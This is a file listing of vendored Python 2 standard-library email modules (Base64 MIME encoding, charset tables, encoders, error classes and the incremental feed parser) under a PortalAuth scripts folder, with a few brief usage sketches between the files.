PortalAuth/includes/scripts/libs/email/_parseaddr.pyc
Executable file
Binary file not shown.
183
PortalAuth/includes/scripts/libs/email/base64mime.py
Executable file
@@ -0,0 +1,183 @@
# Copyright (C) 2002-2006 Python Software Foundation
# Author: Ben Gertzfield
# Contact: email-sig@python.org

"""Base64 content transfer encoding per RFCs 2045-2047.

This module handles the content transfer encoding method defined in RFC 2045
to encode arbitrary 8-bit data using the three 8-bit bytes in four 7-bit
characters encoding known as Base64.

It is used in the MIME standards for email to attach images, audio, and text
using some 8-bit character sets to messages.

This module provides an interface to encode and decode both headers and bodies
with Base64 encoding.

RFC 2045 defines a method for including character set information in an
`encoded-word' in a header.  This method is commonly used for 8-bit real names
in To:, From:, Cc:, etc. fields, as well as Subject: lines.

This module does not do the line wrapping or end-of-line character conversion
necessary for proper internationalized headers; it only does dumb encoding and
decoding.  To deal with the various line wrapping issues, use the email.header
module.
"""

__all__ = [
    'base64_len',
    'body_decode',
    'body_encode',
    'decode',
    'decodestring',
    'encode',
    'encodestring',
    'header_encode',
    ]


from binascii import b2a_base64, a2b_base64
from email.utils import fix_eols

CRLF = '\r\n'
NL = '\n'
EMPTYSTRING = ''

# See also Charset.py
MISC_LEN = 7



# Helpers
def base64_len(s):
    """Return the length of s when it is encoded with base64."""
    groups_of_3, leftover = divmod(len(s), 3)
    # 4 bytes out for each 3 bytes (or nonzero fraction thereof) in.
    # Thanks, Tim!
    n = groups_of_3 * 4
    if leftover:
        n += 4
    return n



def header_encode(header, charset='iso-8859-1', keep_eols=False,
                  maxlinelen=76, eol=NL):
    """Encode a single header line with Base64 encoding in a given charset.

    Defined in RFC 2045, this Base64 encoding is identical to normal Base64
    encoding, except that each line must be intelligently wrapped (respecting
    the Base64 encoding), and subsequent lines must start with a space.

    charset names the character set to use to encode the header.  It defaults
    to iso-8859-1.

    End-of-line characters (\\r, \\n, \\r\\n) will be automatically converted
    to the canonical email line separator \\r\\n unless the keep_eols
    parameter is True (the default is False).

    Each line of the header will be terminated in the value of eol, which
    defaults to "\\n".  Set this to "\\r\\n" if you are using the result of
    this function directly in email.

    The resulting string will be in the form:

    "=?charset?b?WW/5ciBtYXp66XLrIHf8eiBhIGhhbXBzdGHuciBBIFlv+XIgbWF6euly?=\\n
      =?charset?b?6yB3/HogYSBoYW1wc3Rh7nIgQkMgWW/5ciBtYXp66XLrIHf8eiBhIGhh?="

    with each line wrapped at, at most, maxlinelen characters (defaults to 76
    characters).
    """
    # Return empty headers unchanged
    if not header:
        return header

    if not keep_eols:
        header = fix_eols(header)

    # Base64 encode each line, in encoded chunks no greater than maxlinelen in
    # length, after the RFC chrome is added in.
    base64ed = []
    max_encoded = maxlinelen - len(charset) - MISC_LEN
    max_unencoded = max_encoded * 3 // 4

    for i in range(0, len(header), max_unencoded):
        base64ed.append(b2a_base64(header[i:i+max_unencoded]))

    # Now add the RFC chrome to each encoded chunk
    lines = []
    for line in base64ed:
        # Ignore the last character of each line if it is a newline
        if line.endswith(NL):
            line = line[:-1]
        # Add the chrome
        lines.append('=?%s?b?%s?=' % (charset, line))
    # Glue the lines together and return it.  BAW: should we be able to
    # specify the leading whitespace in the joiner?
    joiner = eol + ' '
    return joiner.join(lines)



def encode(s, binary=True, maxlinelen=76, eol=NL):
    """Encode a string with base64.

    Each line will be wrapped at, at most, maxlinelen characters (defaults to
    76 characters).

    If binary is False, end-of-line characters will be converted to the
    canonical email end-of-line sequence \\r\\n.  Otherwise they will be left
    verbatim (this is the default).

    Each line of encoded text will end with eol, which defaults to "\\n".  Set
    this to "\r\n" if you will be using the result of this function directly
    in an email.
    """
    if not s:
        return s

    if not binary:
        s = fix_eols(s)

    encvec = []
    max_unencoded = maxlinelen * 3 // 4
    for i in range(0, len(s), max_unencoded):
        # BAW: should encode() inherit b2a_base64()'s dubious behavior in
        # adding a newline to the encoded string?
        enc = b2a_base64(s[i:i + max_unencoded])
        if enc.endswith(NL) and eol != NL:
            enc = enc[:-1] + eol
        encvec.append(enc)
    return EMPTYSTRING.join(encvec)


# For convenience and backwards compatibility w/ standard base64 module
body_encode = encode
encodestring = encode



def decode(s, convert_eols=None):
    """Decode a raw base64 string.

    If convert_eols is set to a string value, all canonical email linefeeds,
    e.g. "\\r\\n", in the decoded text will be converted to the value of
    convert_eols.  os.linesep is a good choice for convert_eols if you are
    decoding a text attachment.

    This function does not parse a full MIME header value encoded with
    base64 (like =?iso-8895-1?b?bmloISBuaWgh?=) -- please use the high
    level email.header class for that functionality.
    """
    if not s:
        return s

    dec = a2b_base64(s)
    if convert_eols:
        return dec.replace(CRLF, convert_eols)
    return dec


# For convenience and backwards compatibility w/ standard base64 module
body_decode = decode
decodestring = decode
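header_encode() above is the piece that produces RFC 2047 encoded-words, wrapping the base64 payload in the =?charset?b?...?= chrome described in its docstring. A one-line sketch (editor's illustration, Python 2):

from email import base64mime

print base64mime.header_encode('Hello W\xf6rld', charset='iso-8859-1')
# -> =?iso-8859-1?b?SGVsbG8gV/ZybGQ=?=  (single line here; longer headers are
#    wrapped at maxlinelen, with continuation lines starting with a space)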
BIN
PortalAuth/includes/scripts/libs/email/base64mime.pyc
Executable file
Binary file not shown.
397
PortalAuth/includes/scripts/libs/email/charset.py
Executable file
@@ -0,0 +1,397 @@
# Copyright (C) 2001-2006 Python Software Foundation
# Author: Ben Gertzfield, Barry Warsaw
# Contact: email-sig@python.org

__all__ = [
    'Charset',
    'add_alias',
    'add_charset',
    'add_codec',
    ]

import codecs
import email.base64mime
import email.quoprimime

from email import errors
from email.encoders import encode_7or8bit



# Flags for types of header encodings
QP          = 1 # Quoted-Printable
BASE64      = 2 # Base64
SHORTEST    = 3 # the shorter of QP and base64, but only for headers

# In "=?charset?q?hello_world?=", the =?, ?q?, and ?= add up to 7
MISC_LEN = 7

DEFAULT_CHARSET = 'us-ascii'



# Defaults
CHARSETS = {
    # input         header enc  body enc output conv
    'iso-8859-1':   (QP,        QP,      None),
    'iso-8859-2':   (QP,        QP,      None),
    'iso-8859-3':   (QP,        QP,      None),
    'iso-8859-4':   (QP,        QP,      None),
    # iso-8859-5 is Cyrillic, and not especially used
    # iso-8859-6 is Arabic, also not particularly used
    # iso-8859-7 is Greek, QP will not make it readable
    # iso-8859-8 is Hebrew, QP will not make it readable
    'iso-8859-9':   (QP,        QP,      None),
    'iso-8859-10':  (QP,        QP,      None),
    # iso-8859-11 is Thai, QP will not make it readable
    'iso-8859-13':  (QP,        QP,      None),
    'iso-8859-14':  (QP,        QP,      None),
    'iso-8859-15':  (QP,        QP,      None),
    'iso-8859-16':  (QP,        QP,      None),
    'windows-1252': (QP,        QP,      None),
    'viscii':       (QP,        QP,      None),
    'us-ascii':     (None,      None,    None),
    'big5':         (BASE64,    BASE64,  None),
    'gb2312':       (BASE64,    BASE64,  None),
    'euc-jp':       (BASE64,    None,    'iso-2022-jp'),
    'shift_jis':    (BASE64,    None,    'iso-2022-jp'),
    'iso-2022-jp':  (BASE64,    None,    None),
    'koi8-r':       (BASE64,    BASE64,  None),
    'utf-8':        (SHORTEST,  BASE64,  'utf-8'),
    # We're making this one up to represent raw unencoded 8-bit
    '8bit':         (None,      BASE64,  'utf-8'),
    }

# Aliases for other commonly-used names for character sets.  Map
# them to the real ones used in email.
ALIASES = {
    'latin_1': 'iso-8859-1',
    'latin-1': 'iso-8859-1',
    'latin_2': 'iso-8859-2',
    'latin-2': 'iso-8859-2',
    'latin_3': 'iso-8859-3',
    'latin-3': 'iso-8859-3',
    'latin_4': 'iso-8859-4',
    'latin-4': 'iso-8859-4',
    'latin_5': 'iso-8859-9',
    'latin-5': 'iso-8859-9',
    'latin_6': 'iso-8859-10',
    'latin-6': 'iso-8859-10',
    'latin_7': 'iso-8859-13',
    'latin-7': 'iso-8859-13',
    'latin_8': 'iso-8859-14',
    'latin-8': 'iso-8859-14',
    'latin_9': 'iso-8859-15',
    'latin-9': 'iso-8859-15',
    'latin_10':'iso-8859-16',
    'latin-10':'iso-8859-16',
    'cp949':   'ks_c_5601-1987',
    'euc_jp':  'euc-jp',
    'euc_kr':  'euc-kr',
    'ascii':   'us-ascii',
    }


# Map charsets to their Unicode codec strings.
CODEC_MAP = {
    'gb2312':   'eucgb2312_cn',
    'big5':     'big5_tw',
    # Hack: We don't want *any* conversion for stuff marked us-ascii, as all
    # sorts of garbage might be sent to us in the guise of 7-bit us-ascii.
    # Let that stuff pass through without conversion to/from Unicode.
    'us-ascii': None,
    }



# Convenience functions for extending the above mappings
def add_charset(charset, header_enc=None, body_enc=None, output_charset=None):
    """Add character set properties to the global registry.

    charset is the input character set, and must be the canonical name of a
    character set.

    Optional header_enc and body_enc is either Charset.QP for
    quoted-printable, Charset.BASE64 for base64 encoding, Charset.SHORTEST for
    the shortest of qp or base64 encoding, or None for no encoding.  SHORTEST
    is only valid for header_enc.  It describes how message headers and
    message bodies in the input charset are to be encoded.  Default is no
    encoding.

    Optional output_charset is the character set that the output should be
    in.  Conversions will proceed from input charset, to Unicode, to the
    output charset when the method Charset.convert() is called.  The default
    is to output in the same character set as the input.

    Both input_charset and output_charset must have Unicode codec entries in
    the module's charset-to-codec mapping; use add_codec(charset, codecname)
    to add codecs the module does not know about.  See the codecs module's
    documentation for more information.
    """
    if body_enc == SHORTEST:
        raise ValueError('SHORTEST not allowed for body_enc')
    CHARSETS[charset] = (header_enc, body_enc, output_charset)


def add_alias(alias, canonical):
    """Add a character set alias.

    alias is the alias name, e.g. latin-1
    canonical is the character set's canonical name, e.g. iso-8859-1
    """
    ALIASES[alias] = canonical


def add_codec(charset, codecname):
    """Add a codec that map characters in the given charset to/from Unicode.

    charset is the canonical name of a character set.  codecname is the name
    of a Python codec, as appropriate for the second argument to the unicode()
    built-in, or to the encode() method of a Unicode string.
    """
    CODEC_MAP[charset] = codecname



class Charset:
    """Map character sets to their email properties.

    This class provides information about the requirements imposed on email
    for a specific character set.  It also provides convenience routines for
    converting between character sets, given the availability of the
    applicable codecs.  Given a character set, it will do its best to provide
    information on how to use that character set in an email in an
    RFC-compliant way.

    Certain character sets must be encoded with quoted-printable or base64
    when used in email headers or bodies.  Certain character sets must be
    converted outright, and are not allowed in email.  Instances of this
    module expose the following information about a character set:

    input_charset: The initial character set specified.  Common aliases
                   are converted to their `official' email names (e.g. latin_1
                   is converted to iso-8859-1).  Defaults to 7-bit us-ascii.

    header_encoding: If the character set must be encoded before it can be
                     used in an email header, this attribute will be set to
                     Charset.QP (for quoted-printable), Charset.BASE64 (for
                     base64 encoding), or Charset.SHORTEST for the shortest of
                     QP or BASE64 encoding.  Otherwise, it will be None.

    body_encoding: Same as header_encoding, but describes the encoding for the
                   mail message's body, which indeed may be different than the
                   header encoding.  Charset.SHORTEST is not allowed for
                   body_encoding.

    output_charset: Some character sets must be converted before they can be
                    used in email headers or bodies.  If the input_charset is
                    one of them, this attribute will contain the name of the
                    charset output will be converted to.  Otherwise, it will
                    be None.

    input_codec: The name of the Python codec used to convert the
                 input_charset to Unicode.  If no conversion codec is
                 necessary, this attribute will be None.

    output_codec: The name of the Python codec used to convert Unicode
                  to the output_charset.  If no conversion codec is necessary,
                  this attribute will have the same value as the input_codec.
    """
    def __init__(self, input_charset=DEFAULT_CHARSET):
        # RFC 2046, §4.1.2 says charsets are not case sensitive.  We coerce to
        # unicode because its .lower() is locale insensitive.  If the argument
        # is already a unicode, we leave it at that, but ensure that the
        # charset is ASCII, as the standard (RFC XXX) requires.
        try:
            if isinstance(input_charset, unicode):
                input_charset.encode('ascii')
            else:
                input_charset = unicode(input_charset, 'ascii')
        except UnicodeError:
            raise errors.CharsetError(input_charset)
        input_charset = input_charset.lower().encode('ascii')
        # Set the input charset after filtering through the aliases and/or codecs
        if not (input_charset in ALIASES or input_charset in CHARSETS):
            try:
                input_charset = codecs.lookup(input_charset).name
            except LookupError:
                pass
        self.input_charset = ALIASES.get(input_charset, input_charset)
        # We can try to guess which encoding and conversion to use by the
        # charset_map dictionary.  Try that first, but let the user override
        # it.
        henc, benc, conv = CHARSETS.get(self.input_charset,
                                        (SHORTEST, BASE64, None))
        if not conv:
            conv = self.input_charset
        # Set the attributes, allowing the arguments to override the default.
        self.header_encoding = henc
        self.body_encoding = benc
        self.output_charset = ALIASES.get(conv, conv)
        # Now set the codecs.  If one isn't defined for input_charset,
        # guess and try a Unicode codec with the same name as input_codec.
        self.input_codec = CODEC_MAP.get(self.input_charset,
                                         self.input_charset)
        self.output_codec = CODEC_MAP.get(self.output_charset,
                                          self.output_charset)

    def __str__(self):
        return self.input_charset.lower()

    __repr__ = __str__

    def __eq__(self, other):
        return str(self) == str(other).lower()

    def __ne__(self, other):
        return not self.__eq__(other)

    def get_body_encoding(self):
        """Return the content-transfer-encoding used for body encoding.

        This is either the string `quoted-printable' or `base64' depending on
        the encoding used, or it is a function in which case you should call
        the function with a single argument, the Message object being
        encoded.  The function should then set the Content-Transfer-Encoding
        header itself to whatever is appropriate.

        Returns "quoted-printable" if self.body_encoding is QP.
        Returns "base64" if self.body_encoding is BASE64.
        Returns "7bit" otherwise.
        """
        assert self.body_encoding != SHORTEST
        if self.body_encoding == QP:
            return 'quoted-printable'
        elif self.body_encoding == BASE64:
            return 'base64'
        else:
            return encode_7or8bit

    def convert(self, s):
        """Convert a string from the input_codec to the output_codec."""
        if self.input_codec != self.output_codec:
            return unicode(s, self.input_codec).encode(self.output_codec)
        else:
            return s

    def to_splittable(self, s):
        """Convert a possibly multibyte string to a safely splittable format.

        Uses the input_codec to try and convert the string to Unicode, so it
        can be safely split on character boundaries (even for multibyte
        characters).

        Returns the string as-is if it isn't known how to convert it to
        Unicode with the input_charset.

        Characters that could not be converted to Unicode will be replaced
        with the Unicode replacement character U+FFFD.
        """
        if isinstance(s, unicode) or self.input_codec is None:
            return s
        try:
            return unicode(s, self.input_codec, 'replace')
        except LookupError:
            # Input codec not installed on system, so return the original
            # string unchanged.
            return s

    def from_splittable(self, ustr, to_output=True):
        """Convert a splittable string back into an encoded string.

        Uses the proper codec to try and convert the string from Unicode back
        into an encoded format.  Return the string as-is if it is not Unicode,
        or if it could not be converted from Unicode.

        Characters that could not be converted from Unicode will be replaced
        with an appropriate character (usually '?').

        If to_output is True (the default), uses output_codec to convert to an
        encoded format.  If to_output is False, uses input_codec.
        """
        if to_output:
            codec = self.output_codec
        else:
            codec = self.input_codec
        if not isinstance(ustr, unicode) or codec is None:
            return ustr
        try:
            return ustr.encode(codec, 'replace')
        except LookupError:
            # Output codec not installed
            return ustr

    def get_output_charset(self):
        """Return the output character set.

        This is self.output_charset if that is not None, otherwise it is
        self.input_charset.
        """
        return self.output_charset or self.input_charset

    def encoded_header_len(self, s):
        """Return the length of the encoded header string."""
        cset = self.get_output_charset()
        # The len(s) of a 7bit encoding is len(s)
        if self.header_encoding == BASE64:
            return email.base64mime.base64_len(s) + len(cset) + MISC_LEN
        elif self.header_encoding == QP:
            return email.quoprimime.header_quopri_len(s) + len(cset) + MISC_LEN
        elif self.header_encoding == SHORTEST:
            lenb64 = email.base64mime.base64_len(s)
            lenqp = email.quoprimime.header_quopri_len(s)
            return min(lenb64, lenqp) + len(cset) + MISC_LEN
        else:
            return len(s)

    def header_encode(self, s, convert=False):
        """Header-encode a string, optionally converting it to output_charset.

        If convert is True, the string will be converted from the input
        charset to the output charset automatically.  This is not useful for
        multibyte character sets, which have line length issues (multibyte
        characters must be split on a character, not a byte boundary); use the
        high-level Header class to deal with these issues.  convert defaults
        to False.

        The type of encoding (base64 or quoted-printable) will be based on
        self.header_encoding.
        """
        cset = self.get_output_charset()
        if convert:
            s = self.convert(s)
        # 7bit/8bit encodings return the string unchanged (modulo conversions)
        if self.header_encoding == BASE64:
            return email.base64mime.header_encode(s, cset)
        elif self.header_encoding == QP:
            return email.quoprimime.header_encode(s, cset, maxlinelen=None)
        elif self.header_encoding == SHORTEST:
            lenb64 = email.base64mime.base64_len(s)
            lenqp = email.quoprimime.header_quopri_len(s)
            if lenb64 < lenqp:
                return email.base64mime.header_encode(s, cset)
            else:
                return email.quoprimime.header_encode(s, cset, maxlinelen=None)
        else:
            return s

    def body_encode(self, s, convert=True):
        """Body-encode a string and convert it to output_charset.

        If convert is True (the default), the string will be converted from
        the input charset to output charset automatically.  Unlike
        header_encode(), there are no issues with byte boundaries and
        multibyte charsets in email bodies, so this is usually pretty safe.

        The type of encoding (base64 or quoted-printable) will be based on
        self.body_encoding.
        """
        if convert:
            s = self.convert(s)
        # 7bit/8bit encodings return the string unchanged (modulo conversions)
        if self.body_encoding is BASE64:
            return email.base64mime.body_encode(s)
        elif self.body_encoding is QP:
            return email.quoprimime.body_encode(s)
        else:
            return s
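The Charset class is what ties the CHARSETS/ALIASES/CODEC_MAP tables together: construct one and the header/body encoding policy falls out. A small sketch (editor's illustration, Python 2):

from email.charset import BASE64, Charset

c = Charset('euc-jp')
print c.header_encoding == BASE64  # True: headers are base64-encoded
print c.body_encoding              # None: the body is not transfer-encoded
print c.output_charset             # iso-2022-jp: converted on output

latin = Charset('latin_1')         # alias, resolved through ALIASES
print str(latin)                   # -> iso-8859-1
print latin.get_body_encoding()    # -> quoted-printable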
BIN
PortalAuth/includes/scripts/libs/email/charset.pyc
Executable file
Binary file not shown.
82
PortalAuth/includes/scripts/libs/email/encoders.py
Executable file
@@ -0,0 +1,82 @@
# Copyright (C) 2001-2006 Python Software Foundation
# Author: Barry Warsaw
# Contact: email-sig@python.org

"""Encodings and related functions."""

__all__ = [
    'encode_7or8bit',
    'encode_base64',
    'encode_noop',
    'encode_quopri',
    ]

import base64

from quopri import encodestring as _encodestring



def _qencode(s):
    enc = _encodestring(s, quotetabs=True)
    # Must encode spaces, which quopri.encodestring() doesn't do
    return enc.replace(' ', '=20')


def _bencode(s):
    # We can't quite use base64.encodestring() since it tacks on a "courtesy
    # newline".  Blech!
    if not s:
        return s
    hasnewline = (s[-1] == '\n')
    value = base64.encodestring(s)
    if not hasnewline and value[-1] == '\n':
        return value[:-1]
    return value



def encode_base64(msg):
    """Encode the message's payload in Base64.

    Also, add an appropriate Content-Transfer-Encoding header.
    """
    orig = msg.get_payload()
    encdata = _bencode(orig)
    msg.set_payload(encdata)
    msg['Content-Transfer-Encoding'] = 'base64'



def encode_quopri(msg):
    """Encode the message's payload in quoted-printable.

    Also, add an appropriate Content-Transfer-Encoding header.
    """
    orig = msg.get_payload()
    encdata = _qencode(orig)
    msg.set_payload(encdata)
    msg['Content-Transfer-Encoding'] = 'quoted-printable'



def encode_7or8bit(msg):
    """Set the Content-Transfer-Encoding header to 7bit or 8bit."""
    orig = msg.get_payload()
    if orig is None:
        # There's no payload.  For backwards compatibility we use 7bit
        msg['Content-Transfer-Encoding'] = '7bit'
        return
    # We play a trick to make this go fast.  If encoding to ASCII succeeds, we
    # know the data must be 7bit, otherwise treat it as 8bit.
    try:
        orig.encode('ascii')
    except UnicodeError:
        msg['Content-Transfer-Encoding'] = '8bit'
    else:
        msg['Content-Transfer-Encoding'] = '7bit'



def encode_noop(msg):
    """Do nothing."""
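The encoders above are meant to be applied to a Message whose payload is already set; each one rewrites the payload and records the matching Content-Transfer-Encoding header. A sketch (editor's illustration, Python 2):

from email import encoders
from email.message import Message

msg = Message()
msg.set_payload('some payload\n')
encoders.encode_base64(msg)
print msg['Content-Transfer-Encoding']  # -> base64
print msg.get_payload()                 # -> c29tZSBwYXlsb2FkCg==
print msg.get_payload(decode=True)      # -> some payload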
BIN
PortalAuth/includes/scripts/libs/email/encoders.pyc
Executable file
Binary file not shown.
57
PortalAuth/includes/scripts/libs/email/errors.py
Executable file
@@ -0,0 +1,57 @@
# Copyright (C) 2001-2006 Python Software Foundation
# Author: Barry Warsaw
# Contact: email-sig@python.org

"""email package exception classes."""



class MessageError(Exception):
    """Base class for errors in the email package."""


class MessageParseError(MessageError):
    """Base class for message parsing errors."""


class HeaderParseError(MessageParseError):
    """Error while parsing headers."""


class BoundaryError(MessageParseError):
    """Couldn't find terminating boundary."""


class MultipartConversionError(MessageError, TypeError):
    """Conversion to a multipart is prohibited."""


class CharsetError(MessageError):
    """An illegal charset was given."""



# These are parsing defects which the parser was able to work around.
class MessageDefect:
    """Base class for a message defect."""

    def __init__(self, line=None):
        self.line = line

class NoBoundaryInMultipartDefect(MessageDefect):
    """A message claimed to be a multipart but had no boundary parameter."""

class StartBoundaryNotFoundDefect(MessageDefect):
    """The claimed start boundary was never found."""

class FirstHeaderLineIsContinuationDefect(MessageDefect):
    """A message had a continuation line as its first header line."""

class MisplacedEnvelopeHeaderDefect(MessageDefect):
    """A 'Unix-from' header was found in the middle of a header block."""

class MalformedHeaderDefect(MessageDefect):
    """Found a header that was missing a colon, or was otherwise malformed."""

class MultipartInvariantViolationDefect(MessageDefect):
    """A message claimed to be a multipart but no subparts were found."""
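The MessageDefect subclasses above are recorded rather than raised: the parser attaches them to the message's .defects list. A sketch of how they typically surface (editor's illustration, Python 2; the exact defect list depends on the parser version):

from email.parser import Parser

broken = "Content-Type: multipart/mixed\n\nno boundary given\n"
msg = Parser().parsestr(broken)
print [d.__class__.__name__ for d in msg.defects]
# e.g. ['NoBoundaryInMultipartDefect', 'MultipartInvariantViolationDefect']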
BIN
PortalAuth/includes/scripts/libs/email/errors.pyc
Executable file
Binary file not shown.
484
PortalAuth/includes/scripts/libs/email/feedparser.py
Executable file
@@ -0,0 +1,484 @@
# Copyright (C) 2004-2006 Python Software Foundation
# Authors: Baxter, Wouters and Warsaw
# Contact: email-sig@python.org

"""FeedParser - An email feed parser.

The feed parser implements an interface for incrementally parsing an email
message, line by line.  This has advantages for certain applications, such as
those reading email messages off a socket.

FeedParser.feed() is the primary interface for pushing new data into the
parser.  It returns when there's nothing more it can do with the available
data.  When you have no more data to push into the parser, call .close().
This completes the parsing and returns the root message object.

The other advantage of this parser is that it will never throw a parsing
exception.  Instead, when it finds something unexpected, it adds a 'defect' to
the current message.  Defects are just instances that live on the message
object's .defects attribute.
"""

__all__ = ['FeedParser']

import re

from email import errors
from email import message

NLCRE = re.compile('\r\n|\r|\n')
NLCRE_bol = re.compile('(\r\n|\r|\n)')
NLCRE_eol = re.compile('(\r\n|\r|\n)\Z')
NLCRE_crack = re.compile('(\r\n|\r|\n)')
# RFC 2822 $3.6.8 Optional fields.  ftext is %d33-57 / %d59-126, Any character
# except controls, SP, and ":".
headerRE = re.compile(r'^(From |[\041-\071\073-\176]{1,}:|[\t ])')
EMPTYSTRING = ''
NL = '\n'

NeedMoreData = object()



class BufferedSubFile(object):
    """A file-ish object that can have new data loaded into it.

    You can also push and pop line-matching predicates onto a stack.  When the
    current predicate matches the current line, a false EOF response
    (i.e. empty string) is returned instead.  This lets the parser adhere to a
    simple abstraction -- it parses until EOF closes the current message.
    """
    def __init__(self):
        # The last partial line pushed into this object.
        self._partial = ''
        # The list of full, pushed lines, in reverse order
        self._lines = []
        # The stack of false-EOF checking predicates.
        self._eofstack = []
        # A flag indicating whether the file has been closed or not.
        self._closed = False

    def push_eof_matcher(self, pred):
        self._eofstack.append(pred)

    def pop_eof_matcher(self):
        return self._eofstack.pop()

    def close(self):
        # Don't forget any trailing partial line.
        self._lines.append(self._partial)
        self._partial = ''
        self._closed = True

    def readline(self):
        if not self._lines:
            if self._closed:
                return ''
            return NeedMoreData
        # Pop the line off the stack and see if it matches the current
        # false-EOF predicate.
        line = self._lines.pop()
        # RFC 2046, section 5.1.2 requires us to recognize outer level
        # boundaries at any level of inner nesting.  Do this, but be sure it's
        # in the order of most to least nested.
        for ateof in self._eofstack[::-1]:
            if ateof(line):
                # We're at the false EOF.  But push the last line back first.
                self._lines.append(line)
                return ''
        return line

    def unreadline(self, line):
        # Let the consumer push a line back into the buffer.
        assert line is not NeedMoreData
        self._lines.append(line)

    def push(self, data):
        """Push some new data into this object."""
        # Handle any previous leftovers
        data, self._partial = self._partial + data, ''
        # Crack into lines, but preserve the newlines on the end of each
        parts = NLCRE_crack.split(data)
        # The *ahem* interesting behaviour of re.split when supplied grouping
        # parentheses is that the last element of the resulting list is the
        # data after the final RE.  In the case of a NL/CR terminated string,
        # this is the empty string.
        self._partial = parts.pop()
        #GAN 29Mar09  bugs 1555570, 1721862  Confusion at 8K boundary ending with \r:
        # is there a \n to follow later?
        if not self._partial and parts and parts[-1].endswith('\r'):
            self._partial = parts.pop(-2)+parts.pop()
        # parts is a list of strings, alternating between the line contents
        # and the eol character(s).  Gather up a list of lines after
        # re-attaching the newlines.
        lines = []
        for i in range(len(parts) // 2):
            lines.append(parts[i*2] + parts[i*2+1])
        self.pushlines(lines)

    def pushlines(self, lines):
        # Reverse and insert at the front of the lines.
        self._lines[:0] = lines[::-1]

    def is_closed(self):
        return self._closed

    def __iter__(self):
        return self

    def next(self):
        line = self.readline()
        if line == '':
            raise StopIteration
        return line
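# Editor's sketch (illustrative, not part of the vendored file): the
# FeedParser defined below is driven incrementally, e.g. while reading
# from a socket:
#
#     parser = FeedParser()
#     for chunk in ('From: a@example.com\r\n', '\r\n', 'body\r\n'):
#         parser.feed(chunk)       # push data as it arrives
#     root = parser.close()        # finish parsing, get the root Message
#     assert root['From'] == 'a@example.com'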
class FeedParser:
|
||||
"""A feed-style parser of email."""
|
||||
|
||||
def __init__(self, _factory=message.Message):
|
||||
"""_factory is called with no arguments to create a new message obj"""
|
||||
self._factory = _factory
|
||||
self._input = BufferedSubFile()
|
||||
self._msgstack = []
|
||||
self._parse = self._parsegen().next
|
||||
self._cur = None
|
||||
self._last = None
|
||||
self._headersonly = False
|
||||
|
||||
# Non-public interface for supporting Parser's headersonly flag
|
||||
def _set_headersonly(self):
|
||||
self._headersonly = True
|
||||
|
||||
def feed(self, data):
|
||||
"""Push more data into the parser."""
|
||||
self._input.push(data)
|
||||
self._call_parse()
|
||||
|
||||
def _call_parse(self):
|
||||
try:
|
||||
self._parse()
|
||||
except StopIteration:
|
||||
pass
|
||||
|
||||
def close(self):
|
||||
"""Parse all remaining data and return the root message object."""
|
||||
self._input.close()
|
||||
self._call_parse()
|
||||
root = self._pop_message()
|
||||
assert not self._msgstack
|
||||
# Look for final set of defects
|
||||
if root.get_content_maintype() == 'multipart' \
|
||||
and not root.is_multipart():
|
||||
root.defects.append(errors.MultipartInvariantViolationDefect())
|
||||
return root
|
||||
|
||||
def _new_message(self):
|
||||
msg = self._factory()
|
||||
if self._cur and self._cur.get_content_type() == 'multipart/digest':
|
||||
msg.set_default_type('message/rfc822')
|
||||
if self._msgstack:
|
||||
self._msgstack[-1].attach(msg)
|
||||
self._msgstack.append(msg)
|
||||
self._cur = msg
|
||||
self._last = msg
|
||||
|
||||
def _pop_message(self):
|
||||
retval = self._msgstack.pop()
|
||||
if self._msgstack:
|
||||
self._cur = self._msgstack[-1]
|
||||
else:
|
||||
self._cur = None
|
||||
return retval
|
||||
|
||||
    def _parsegen(self):
        # Create a new message and start by parsing headers.
        self._new_message()
        headers = []
        # Collect the headers, searching for a line that doesn't match the RFC
        # 2822 header or continuation pattern (including an empty line).
        for line in self._input:
            if line is NeedMoreData:
                yield NeedMoreData
                continue
            if not headerRE.match(line):
                # If we saw the RFC defined header/body separator
                # (i.e. newline), just throw it away.  Otherwise the line is
                # part of the body so push it back.
                if not NLCRE.match(line):
                    self._input.unreadline(line)
                break
            headers.append(line)
        # Done with the headers, so parse them and figure out what we're
        # supposed to see in the body of the message.
        self._parse_headers(headers)
        # Headers-only parsing is a backwards compatibility hack, which was
        # necessary in the older parser, which could throw errors.  All
        # remaining lines in the input are thrown into the message body.
        if self._headersonly:
            lines = []
            while True:
                line = self._input.readline()
                if line is NeedMoreData:
                    yield NeedMoreData
                    continue
                if line == '':
                    break
                lines.append(line)
            self._cur.set_payload(EMPTYSTRING.join(lines))
            return
        if self._cur.get_content_type() == 'message/delivery-status':
            # message/delivery-status contains blocks of headers separated by
            # a blank line.  We'll represent each header block as a separate
            # nested message object, but the processing is a bit different
            # than standard message/* types because there is no body for the
            # nested messages.  A blank line separates the subparts.
            while True:
                self._input.push_eof_matcher(NLCRE.match)
                for retval in self._parsegen():
                    if retval is NeedMoreData:
                        yield NeedMoreData
                        continue
                    break
                msg = self._pop_message()
                # We need to pop the EOF matcher in order to tell if we're at
                # the end of the current file, not the end of the last block
                # of message headers.
                self._input.pop_eof_matcher()
                # The input stream must be sitting at the newline or at the
                # EOF.  We want to see if we're at the end of this subpart, so
                # first consume the blank line, then test the next line to see
                # if we're at this subpart's EOF.
                while True:
                    line = self._input.readline()
                    if line is NeedMoreData:
                        yield NeedMoreData
                        continue
                    break
                while True:
                    line = self._input.readline()
                    if line is NeedMoreData:
                        yield NeedMoreData
                        continue
                    break
                if line == '':
                    break
                # Not at EOF so this is a line we're going to need.
                self._input.unreadline(line)
            return
        if self._cur.get_content_maintype() == 'message':
            # The message claims to be a message/* type, then what follows is
            # another RFC 2822 message.
            for retval in self._parsegen():
                if retval is NeedMoreData:
                    yield NeedMoreData
                    continue
                break
            self._pop_message()
            return
        if self._cur.get_content_maintype() == 'multipart':
            boundary = self._cur.get_boundary()
            if boundary is None:
                # The message /claims/ to be a multipart but it has not
                # defined a boundary.  That's a problem which we'll handle by
                # reading everything until the EOF and marking the message as
                # defective.
                self._cur.defects.append(errors.NoBoundaryInMultipartDefect())
                lines = []
                for line in self._input:
                    if line is NeedMoreData:
                        yield NeedMoreData
                        continue
                    lines.append(line)
                self._cur.set_payload(EMPTYSTRING.join(lines))
                return
            # Create a line match predicate which matches the inter-part
            # boundary as well as the end-of-multipart boundary.  Don't push
            # this onto the input stream until we've scanned past the
            # preamble.
            separator = '--' + boundary
            boundaryre = re.compile(
                '(?P<sep>' + re.escape(separator) +
                r')(?P<end>--)?(?P<ws>[ \t]*)(?P<linesep>\r\n|\r|\n)?$')
            capturing_preamble = True
            preamble = []
            linesep = False
            while True:
                line = self._input.readline()
